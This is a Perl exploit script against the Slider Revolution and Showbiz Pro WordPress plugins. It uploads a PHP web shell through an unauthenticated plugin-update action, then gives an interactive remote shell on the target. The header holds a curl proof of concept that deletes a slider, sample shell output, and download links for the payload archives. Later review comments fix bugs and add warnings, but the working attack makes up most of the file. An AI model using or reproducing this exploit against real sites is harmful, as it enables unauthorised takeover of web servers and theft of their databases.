#!/usr/bin/perl
#
# Title: Slider Revolution/Showbiz Pro shell upload exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered: 15 October 2014
# Coded: 15 October 2014
# Updated: 25 November 2014
# Published: 25 November 2014
# MorXploit Research
# http://www.MorXploit.com
# Vendor: ThemePunch
# Vendor url: http://themepunch.com
# Software: Revslider/Showbiz Pro
# Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro)
# Products url:
# http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988
# Vulnerable scripts:
# revslider/revslider_admin.php
# showbiz/showbiz_admin.php
#
# About the plugins:
# The #1 Slider plugin, used by millions, slider revolution is an all-purpose slide displaying solution that allows for showing almost any
# kind of content with highly customizable transitions, effects and custom animations.
# Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set
# amount of teaser items.
#
# Description:
# Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php, allowing an unauthenticated
# attacker to abuse administrative features.
# Some of the features include:
# Creating/Deleting/Updating sliders
# Importing/exporting sliders
# Updating the plugin
# For a full list of functions please see revslider_admin.php/showbiz_admin.php
#
# PoC on revslider:
# 1- Deleting a slider:
# root@host:/home/rootuser# curl -v --data "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1"
# http://****.com/wp-admin/admin-ajax.php
# * Connected to ****.com (**.**.**.**) port 80 (#0)
# > POST /wp-admin/admin-ajax.php HTTP/1.1
# > User-Agent: curl/7.35.0
# > Host: ****.com
# > Accept: */*
# > Content-Length: 73
# > Content-Type: application/x-www-form-urlencoded
# >
# * upload completely sent off: 73 out of 73 bytes
# < HTTP/1.1 200 OK
# < Date: Fri, 24 Oct 2014 23:25:07 GMT
# * Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted
# < Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
# < X-Powered-By: PHP/5.4.18
# < X-Robots-Tag: noindex
# < X-Content-Type-Options: nosniff
# < Expires: Wed, 11 Jan 1984 05:00:00 GMT
# < Cache-Control: no-cache, must-revalidate, max-age=0
# < Pragma: no-cache
# < X-Frame-Options: SAMEORIGIN
# < Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/
# < Transfer-Encoding: chunked
# < Content-Type: text/html; charset=UTF-8
# <
# * Connection #0 to host http://****.com left intact
#
# {"success":true,"message":"The slider deleted","is_redirect":true,"redirect_url":"http:\/\/****.com\/wp-admin\/admin.php?page=revslider&view=sliders"}
#
# 2- Uploading a web shell:
# The following Perl exploit will try to upload a PHP web shell through the update_plugin function.
# To use the exploit, make sure you first download the revslider.zip and showbiz.zip files, which contain cmd.php:
# http://www.morxploit.com/morxploits/revslider.zip
# http://www.morxploit.com/morxploits/showbiz.zip
# and save them in the same directory where you have the exploit.
#
# Demo:
# perl morxrev.pl http://localhost revslider
# ===================================================
# --- Revslider/Showbiz shell upload exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] Target set to revslider
# [*] MorXploiting http://localhost
# [*] Sent payload
# [+] Payload successfully executed
# [*] Checking if shell was uploaded
# [+] Shell successfully uploaded
#
# Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
# www-data@MorXploit:~$
#
# Download:
# Exploit:
# http://www.morxploit.com/morxploits/morxrevbiz.pl
# Exploit update zip files:
# http://www.morxploit.com/morxploits/revslider.zip
# http://www.morxploit.com/morxploits/showbiz.zip
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Mitigation:
# Besides the LFI vulnerability that was published a couple of months ago, this is another vulnerability that the revslider developers have
# decided to patch without releasing a full security advisory, leaving thousands of revslider users who didn't update their plugin to the
# latest version (>= 3.0.96) vulnerable to this nasty flaw. The revslider developers will argue that their slider comes with an
# auto-update feature, but the problem is that this plugin is bundled with a lot of themes, which means that those theme users may not get
# plugin updates or will have to pay to get the update. In other words, the revslider developers believe that every user should have the
# auto-update feature on; otherwise ... you are screwed.
# Obviously this is way more critical than the LFI vulnerability because it allows shell access, giving attackers access to the target system
# as well as the ability to dump the entire WordPress database locally.
# That being said, upgrade immediately to the latest version or disable/switch to another plugin.
# As for Showbiz Pro, sadly the vulnerability had not been patched as of this writing: we successfully exploited it in the latest version (1.7.1).
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# The author cannot be held responsible for any malicious use or damage. Use at your own risk.
#
# Got comments or questions?
# Simo_at_MorXploit_dot_com
#
# Did you like this exploit?
# Feel free to buy me a beer =)
# My btc address: 1Ko12CUAFoWn8syrvg4aQokFedNiwD6d7u
# Cheers!
use LWP::UserAgent;
use MIME::Base64;
use strict;
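# Clear the terminal and print the tool banner.
# The clear-screen command goes through the shell, but the argument is a
# fixed literal chosen on $^O, so no user-controlled data reaches system().
sub banner {
    system(($^O eq 'MSWin32') ? 'cls' : 'clear');
    print "===================================================\n";
    print "--- Revslider/Showbiz shell upload exploit\n";
    print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
    print "--- MorXploit Research www.MorXploit.com\n";
    print "===================================================\n";
}

# Usage check: both <target> and <plugin> are required.
# The original test, !defined($ARGV[0] && $ARGV[1]), checked the definedness
# of the && result rather than of each argument; counting @ARGV states the
# intent directly and behaves the same for every command line that can occur.
if (@ARGV < 2) {
    banner();
    print "perl $0 <target> <plugin>\n";
    print "perl $0 http://localhost revslider\n";
    print "perl $0 http://localhost showbiz\n";
    exit;
}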
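# Update archives that get POSTed as the "plugin update". Each must contain
# cmd.php, which is what is expected to land on the target as the web shell.
# NOTE(review): the header points at a third-party site for these archives.
# Inspect what is inside before uploading them to a system you are authorised
# to test -- whatever the archive contains will be unpacked on the target.
my $zip1 = "revslider.zip";
my $zip2 = "showbiz.zip";

# Both archives are required regardless of which plugin is selected later
# (unchanged from the original behaviour). The original check,
# -e ($zip1 && $zip2), evaluated the && first and therefore only ever tested
# for $zip2; a missing revslider.zip went unnoticed until the upload failed.
my @missing_zips = grep { !-e $_ } ($zip1, $zip2);
if (@missing_zips) {
    banner();
    print "[-] @missing_zips not found! RTFM\n";
    exit;
}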
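# Command-line arguments: base URL of the WordPress site, and the plugin to
# attack ("revslider" or "showbiz").
my $host   = $ARGV[0];
my $plugin = $ARGV[1];

# Normalise the base URL so the relative paths appended below always form a
# valid absolute URL: LWP rejects a bare hostname ("URL must be absolute"),
# and a trailing slash would otherwise yield "http://site//wp-admin/...".
$host =~ s{/+\z}{};
$host = "http://$host" unless $host =~ m{\A https?:// }xi;

# Per-plugin admin-ajax action name and the archive that gets uploaded.
my %action_for = (
    revslider => 'revslider_ajax_action',
    showbiz   => 'showbiz_ajax_action',
);
my %zip_for = (
    revslider => $zip1,
    showbiz   => $zip2,
);

my $action;
my $update_file;
if (exists $action_for{$plugin}) {
    $action      = $action_for{$plugin};
    $update_file = $zip_for{$plugin};
}
else {
    banner();
    print "[-] Wrong plugin name\n";
    print "perl $0 <target> <plugin>\n";
    print "perl $0 http://localhost revslider\n";
    print "perl $0 http://localhost showbiz\n";
    exit;
}

# WordPress AJAX entry point (relative to $host); the "action" POST field
# selects the plugin's *_ajax_action handler.
my $target = "wp-admin/admin-ajax.php";

# Path where cmd.php is expected after the plugin unpacks the uploaded
# archive. The directory name suggests the plugin extracts the update into
# temp/update_extract before validating it -- TODO confirm against the plugin
# source of the version under test if the check below reports 404.
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php";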
# Return one browser User-Agent string chosen uniformly at random, so the
# requests do not carry the default libwww-perl signature.
sub randomagent {
    my @agents = (
        'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
        'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31',
    );
    my $index = int(rand(scalar @agents));
    return $agents[$index];
}
my $useragent = randomagent();

# HTTP client. verify_hostname => 0 turns off TLS certificate validation so
# self-signed or mismatched targets still work; the cost is that anyone
# on-path can read or alter every request, including the shell commands
# sent later in this script.
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);

# Reachability probe: a plain GET of admin-ajax.php. Only the HTTP status is
# evaluated; the body is not interpreted here.
# NOTE(review): if the target's WordPress answers an action-less request with
# a non-2xx status, this probe aborts before the exploit is even attempted --
# verify that against the target if the script stops here.
my $status = $ua->get("$host/$target");
if (!$status->is_success) {
    banner();
    print "[-] Xploit failed: " . $status->status_line . "\n";
    exit;
}
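banner();
print "[*] Target set to $plugin\n";
print "[*] MorXploiting $host\n";

# Send the update_plugin action with the archive attached as a multipart
# upload. An empty Cookie header is sent explicitly: no WordPress session is
# involved, which is the point of the issue described in the header.
my $exploit = $ua->post(
    "$host/$target",
    Cookie       => "",
    Content_Type => "form-data",
    Content      => [
        action        => $action,
        client_action => "update_plugin",
        update_file   => [$update_file],
    ],
);
print "[*] Sent payload\n";

# Classify the response body. The strings below are the replies observed by
# the author; they are matched literally, not parsed.
my $body = $exploit->decoded_content;
if ($body =~ /Wrong update extracted folder/) {
    # The archive was unpacked (so cmd.php is on disk) and only then
    # rejected by the folder check -- this is the success case.
    print "[+] Payload successfully executed\n";
}
elsif ($body =~ /Wrong request/) {
    # The handler refused the request up front (e.g. a patched build).
    print "[-] Payload failed: Not vulnerable\n";
    exit;
}
elsif ($body =~ /\A\s*0\s*\z/) {
    # WordPress answers a bare "0" when no handler is registered for the
    # action. The original test, m/0$/, also matched any page whose text
    # merely ended in "0" (e.g. "... on line 10") and hid the real error.
    print "[-] Payload failed: Plugin unavailable\n";
    exit;
}
else {
    # Try to pull a PHP error message out of the HTML; otherwise dump the
    # body. Capturing inside the condition avoids reading $1 after a
    # failed match.
    if ($body =~ m{</b>(.*?)<br>}) {
        print "[-] Payload failed:$1\n";
    }
    else {
        print "[-] Payload failed:\n";
        print "[-] $body";
    }
    print "\n";
    exit;
}
print "[*] Checking if shell was uploaded\n";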
# Build a random string: the first argument is the length, the remaining
# arguments are the alphabet to draw from (with replacement).
sub rndstr {
    my $length   = shift;
    my @alphabet = @_;
    my $result   = '';
    for (1 .. $length) {
        $result .= $alphabet[rand @alphabet];
    }
    return $result;
}
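# Build the URL that hands one command to the dropped cmd.php. The command is
# base64-encoded without the trailing newline and then percent-encoded,
# because the base64 alphabet contains '+', '/' and '=': sent raw in a query
# string, '+' is decoded to a space on the server and the command is silently
# corrupted (the original hit this intermittently, depending on the bytes of
# the command).
sub _shell_url {
    my ($command) = @_;
    my $encoded = encode_base64($command, '');
    $encoded =~ s/([^A-Za-z0-9\-._~])/sprintf('%%%02X', ord($1))/ge;
    return "$host/$shell?cmd=$encoded";
}

# Send one command to the shell and return the HTTP::Response.
sub _run_remote {
    my ($command) = @_;
    return $ua->get(_shell_url($command));
}

# Verify the shell: echo a random token and look for it in the reply.
my $rndstr     = rndstr(8, 1 .. 9, 'a' .. 'z');
my $probe      = _run_remote("echo $rndstr");
my $probe_body = $probe->decoded_content;
if ($probe_body =~ /system\(\) has been disabled/) {
    # Presumably cmd.php's own message when PHP's disable_functions blocks
    # system(): the file landed but cannot execute anything.
    print "[-] Xploit failed: system() has been disabled\n";
    exit;
}
elsif ($probe_body !~ /\Q$rndstr\E/) {
    print "[-] Xploit failed: " . $probe->status_line . "\n";
    exit;
}
print "[+] Shell successfully uploaded\n";

# Basic fingerprint of the host. The four requests are issued first and the
# uname -a / id output printed afterwards, as before.
my $whoami = _run_remote("whoami");
my $uname  = _run_remote("uname -n");
my $id     = _run_remote("id");
my $unamea = _run_remote("uname -a");
print $unamea->decoded_content;
print $id->decoded_content;

my $wa = $whoami->decoded_content // '';
my $un = $uname->decoded_content  // '';
chomp($wa);
chomp($un);

# Interactive loop: "exit" leaves, anything else is run remotely and its
# output printed verbatim.
# NOTE(review): this client sends no credentials to cmd.php, so treat it as
# an unauthenticated backdoor reachable by anyone who knows the path; remove
# it (the temp/update_extract directory) once the engagement is over.
while (1) {
    print "\n$wa\@$un:~\$ ";
    my $line = <STDIN>;
    if (!defined $line) {
        # Ctrl-D / closed stdin. The original looped forever here, sending
        # an empty command to the target on every iteration.
        print "\n";
        last;
    }
    chomp $line;
    if ($line eq "exit") {
        print "Aurevoir!\n";
        exit;
    }
    my $output = _run_remote($line);
    print $output->decoded_content;
}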